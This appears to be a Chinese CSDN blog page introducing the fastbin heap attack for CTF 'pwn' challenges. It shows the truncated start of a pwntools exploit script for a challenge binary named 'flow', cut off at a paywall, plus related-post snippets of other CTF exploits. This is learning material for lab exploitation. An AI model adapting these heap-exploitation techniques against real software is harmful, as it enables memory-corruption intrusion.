pwn 堆入门之fastbin attack

最新推荐文章于 2024-06-30 18:17:50 发布
最新推荐文章于 2024-06-30 18:17:50 发布
阅读量296 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42689613/article/details/115406819
版权
本文介绍了CTF中的堆溢出概念,重点讲解了fastbin attack,涉及涅普计划的ctf入门课程。文章通过流程分析(flow)和Oreo结构体展示了add、show_rifles、order、message等函数的功能,并探讨了两种泄露libc地址的方法:show_rifles和show_stats。同时,提供了脚本分析和程序调试过程。
摘要由CSDN通过智能技术生成

目录


b站原本有一个对堆基础讲的挺好的,好像叫 pwn术进阶的堆溢出,但刚刚去看已经没了,好家伙,还好我刚看完,哈哈哈。

flow

涅普计划-ctf入门课堆溢出

#!/usr/bin/env python2
from pwn import *

context(os="linux", arch="amd64", log_level="debug")

#libc
libc=ELF("libc.so.6")
malloc_libc=libc.symbols['__malloc_hook']

menu='ch:'
def add(index,size,content):
	io.sendlineafter(menu,"1")
	io.sendlineafter("?",str(index))
	io.sendlineafter("??",str(size))
	io.sendlineafter(":",content)

def edit(index,size,content):
	io.sendlineafter(menu,"3")
	io.sendlineafter("?",str(index))
	io.sendlineafter("??",str(size))
	io.sendlineafter("say something:",content)

def delet(index):
	io.sendlineafter(menu,"2")
	io.sendlineafter("?",str(index))

def show(index):
	io.sendlineafter(menu,"4")
	io.sendlineafter("?",str(index))
def b(addr):
	# bk="b *$rebase("+str(addr)+")"
	bk="b *"+str(addr)
	attach(io,bk)
	success("attach")
def main(debug):
    global io
    if debug == 0:
        io = process("./flow")
    else:
        io = remote("")
    #leak
    add(0,0x80,'freedom')   #unsorted bins<
最低0.47元/天 解锁文章
qingmu-z
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn 入门之off by one
清霂的博客
04-18 210
目录Asis CTF 2016 b00ks Asis CTF 2016 b00ks #!/usr/bin/env python2 from pwn import * arch = "amd64" filename = "b00ks" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) menu_addr=0x0000000000000A89 free_got
pwn-入门
yajuanpi4899的博客
12-19 913
pwn入门
pwn基础之基础知识超详解
最新发布
qq_73554831的博客
06-30 850
Top chunk,在第一次malloc的时候,glibc就会将切成两块chunk,第一块chunk就是分配出去的chunk,剩下的空间视为top chunk,之后要是分配空间不足时将会由top chunk分配出去,它的size为表示top chunk还剩多少空间。释放一个fast chunk时,首先检查它的大小以及对应fastbin此时的第一个chunk的大小是否合法,随后它会被插入到对应fastbin的链表头,此时其fd指向上一个被free的chunk。(关于top chunk的位置)!
pwn一篇入门
qq_42863961的博客
05-25 389
能帮到你的话,就给个赞吧 ???? 由于我在其他地方编辑,但不想再重新编辑一份,于是把链接放在这里吧 https://note.youdao.com/ynoteshare1/index.html?id=03e7ab6c45cf0b425c8a3a5d0d0e03db&type=note
pwnfastbin attack
weixin_43960998的博客
07-06 180
1、0ctf2017-babyheap from pwn import * import sys binary = "./pwn" context.log_level = "debug" context.binary = binary context.arch = "amd64" elf = ELF(binary) local = 1 if local: p = process(binary) libc = elf.libc # p = process(binary, env=
pwn入门
qq_35066257的博客
04-10 2444
在程序执行的过程中,由malloc申请的内存空间被称作chunk,而当程序申请的chunk被free时会被加入到相应的空闲管理列表(bin)中。 Chunk结构: 解释: pre_size: 前一个chunk块的大小,如果chunk_size的P位为1则pre_size无效,上个chunk可以使用pre_size的空间。(前一个chunk块的大小,指的是低地址的chunk) chunk_size...
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门PWN的学习,是入门指导。
warmup pwn入门
02-11
pwn入门
pwn入门题目+exp
01-26
初级的ROP,附有完整exp,可以学一下
pwn学习总结(八)—— (持续更新)
01-07
pwn学习总结(八)—— (持续更新)前言chunk使用中(分配后)空闲中(释放后)块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料参考自互联网 chunk 描述: 当用户通过malloc等函数申请空间时,实际上是从中分配内存 目前 Linux 标准发行版中使用的是 glibc 中的分配器:ptmalloc2 ptmalloc根据用户的需要,为用户分配不同类型的chunk 结构体: struct malloc_chunk { INTERNAL_SIZE_T p
pwn 基础
qq_41696518的博客
09-03 747
是用malloc函数申请使用的。假设我们通过void * ptr = malloc(0x10);系统会调用一些函数在内存中开辟一大片空间作为的分配使用空间。malloc函数再从这篇的分配使用空间中分配0x10大小的空间,将指向该空间的地址返回给ptr(余下的空间称之为topthunk)chunk:用户申请内存的单位,也是管理器管理内存的基本单位 malloc()返回的指针指向一个chunk的数据区域。
pwn入门(3)
农夫果园好好喝的博客
07-22 639
是虚拟地址空间的一块连续的线性区域提供动态分配的内存,允许程序申请大小未知的内存在用户与操作系统之间,作为动态内存管理的中间人响应用户的申请内存请求,向操作系统申请内存,然后将其返回给用户程序管理用户所释放的内存,适时归还给操作系统。...
PWN_glibc管理机制及内存结构(入门篇)
weixin_57140753的博客
12-25 375
CTF利用基础
Linux pwn入门教程,pwn入门系列教程1
weixin_29015899的博客
05-02 522
pwn入门系列教程1因为自己学的时候,找不到一个系统的教程,我将会按照ctf-wiki的目录一步步学下去,尽量做到每周有更新,方便跟我一样刚入门的人学习,第一篇教程研究了4天吧,途中没人指导。。很尴尬,自己一个很容易的点研究了很久才懂,把踩过的坑也总结下,方便后人不再踩坑学习链接环境搭建off by one原理(引用ctf-wiki)off-by-one 是指单字节缓冲区溢出,这种漏洞的产生...
fastbin attack快速入门
abelxu
11-13 1146
0x01 fastbin简介 Fastbin包含0x20~0x80大小bin的数组指针,用于快速分配小块。fastbin按照单链表结构进行组织,相同大小的bin在同一个链表中,fd指向下一个bin,采用LIFO(Last In First Out)机制。在fastbin中,块的inuse标志都为1,处于占用状态,防止chunk释放时进行合并,加快小块的分配。 正常fastbin的使用 通过这个简单的案例来了解fastbin的单链表结构,malloc和free的过程。 #include<stdio
ctfpwn入门第一次学
2301_79880074的博客
03-08 910
先通过一篇博客去大概的了解一下的前置基础知识吧,我做了一道2.23版本的题,在诸多版本中算是比较简单的一个题了。
ctf-pwn利用之unlink exploit(入门)
Vicl1fe的博客
09-17 1132
首先:阅读本文需要一定的基础知识。 参考链接:传送门 传送门 题目链接:传送门 Unlink unlink技术原理参考这个网址:传送门 现在看下面的代码。上面有题目链接。我的测试环境是ubuntu14和pwndbg。 #include <unistd.h> #include <stdlib.h> #include <string.h> #include &lt...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值